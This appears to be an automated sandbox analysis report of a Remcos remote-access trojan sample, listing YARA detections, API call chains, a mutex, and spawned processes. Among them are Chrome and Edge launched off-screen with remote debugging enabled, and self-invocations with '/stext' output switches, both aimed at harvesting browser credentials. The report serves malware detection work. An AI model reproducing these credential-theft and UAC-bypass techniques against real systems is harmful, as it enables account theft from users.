                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: OriginalFilename vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@68/244@15/17
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,4_2_004182CE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00416AB7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,6_2_00410DE1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,4_2_00418758
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040E219
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041A64F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Mutant created: \Sessions\1\BaseNamedObjects\fyhstga-ONSWMZ
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File created: C:\Users\user\AppData\Local\Temp\TmpUserData
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Software\0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: fyhstga-ONSWMZ0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Exe0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: 0DG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Inj0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: @CG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: exepath0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: licence0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: `=G0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: dCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Administrator0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: User0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: del0_2_0040D767
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe System information queried: HandleInformation
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572038865.00000000027A0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeVirustotal: Detection: 75%
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winmm.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: srvcli.dll
